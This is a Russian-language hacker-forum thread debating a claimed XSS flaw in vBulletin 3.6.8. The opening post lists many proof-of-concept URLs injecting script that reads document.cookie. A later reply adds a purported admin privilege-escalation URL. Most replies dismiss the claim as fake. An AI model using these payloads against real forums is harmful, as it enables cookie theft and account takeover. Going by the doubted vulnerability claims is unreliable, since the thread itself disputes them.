[IchWill]

Цитата:

Программа: vBulletin V3.6.8

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

[site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=
all&titlesonly=0

Код:

[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=1

Код:

[site]/[path]/index.php?s=<script>alert('document.cookie')</script>

Код:

[site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0

Код:

[site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2
Fscript&match=all&titlesonly=0

Код:

[site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0

Код:

[site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0

Код:

[site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0

Код:

[site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0

Код:

[site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E
alert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0

Код:

[site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0

Код:

[site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0

Код:

[site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0

Код:

[site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0

Код:

[site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0

Источник http://www.securitysib.com/2007/08/14/vbulletin.html

Кто что думает?

[Proff]

а в 3.6.7 её нету ?

[netwind]

чето бред какойто
где источник?

[Malcolm Reed]

Цитата:

Сообщение от netwind

чето бред какойто

+1

Цитата:

Сообщение от IchWill

&q=XSS

Такой приметив да в вобле? Я вас умоляю.

Цитата:

Сообщение от IchWill

u=1=s'&q=XSS

Бред больного поросенка =\

Вообще это из оперы "папа подключил мне инетку и я зашел на античат". Кто-то натыкал в урлы совершенно глупые строчки, не понимая что они вообще делают, и решил выдать это за уязвимость.

[zCarot]

чё думать ) пробуйте и убеждайтесь рабит иль нет )

Цитата:

Сообщение от IchWill

[site]/[path]/index.php?s=<script>alert('document.cookie')</script>

убило

[zCarot]

а во я ещё нашёл поднятие прав юзера с userid X до группы админов:

Код:

[site]/[path]/[path2admincp]/init.php?uid=1&sugid=6&suid=X

[zl0]

это чо правда???? честно непойму :( на том сайте правда написано,ток незнаю правда ли на 3.6.8 работает

[Hobot]

адрес сайта http://www.securitysib.com доверия не внушает.
он скорее похож на один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc

[IchWill]

Цитата:

адрес сайта http://www.securitysib.com доверия не внушает.
он скорее похож на один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc

один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc - http://securityvulns.ru/Rdocument840.html
и еще один не внушающий доверия сайт http://www.google.ru/search?q=vBulle...sword+Md5+Hash

[zCarot]

IchWill, чем больше по инету распространяется fake, тем больше мы видим сайтов, которые не проверяют информацию )